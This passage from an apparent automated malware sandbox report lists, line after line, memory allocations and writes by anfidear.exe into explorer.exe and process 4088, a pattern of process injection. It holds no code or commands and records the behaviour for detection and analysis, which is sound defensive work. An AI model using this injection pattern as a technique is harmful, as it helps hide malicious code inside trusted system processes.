Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 101F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10200000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10210000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10220000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10230000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10240000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10250000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10260000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10270000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10280000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10290000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 102A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 102B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 102C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 103D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 103E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10400000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10410000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10420000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10430000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10440000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 104F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10500000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10530000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10540000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10550000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10560000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10570000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10580000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10590000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 105F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10600000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10610000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10640000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10650000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10660000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10670000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10680000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10690000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 106F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10700000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10710000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10720000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10620000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10630000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10730000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10740000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10750000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10760000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10770000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10780000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10790000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 107F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10800000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10810000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10820000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10830000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10840000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10850000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10860000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10870000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10880000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10890000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 108F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10900000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10910000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10920000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10930000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10940000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10950000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: E4C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 109F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10A90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10AF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10B90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10BF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10C80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10CB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10CC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10CD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10CE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10CF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 10D00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: B40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2A40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: AB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2A50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2CB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2CC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 85B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 76F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 85C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 85E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 85F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: CD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: ADE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A770000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 81C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 81D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 81F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8200000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8210000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 84C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 84D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 84E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 84F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8500000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: CC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8510000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8520000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 8530000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 85D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A8C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9450000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9460000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9470000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2960000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2970000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 29A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2980000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 2990000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 29B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 29C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 29D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 7F70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 90C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 90D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9130000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 90E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 90F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9100000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9110000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9120000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9350000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9360000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9370000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9380000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9390000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9270000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 93C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 94A0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9480000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 9490000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 94B0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: 94C0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A8D0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A8E0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A8F0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A900000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: PID: 4088 base: A910000 value: 43Jump to behavior
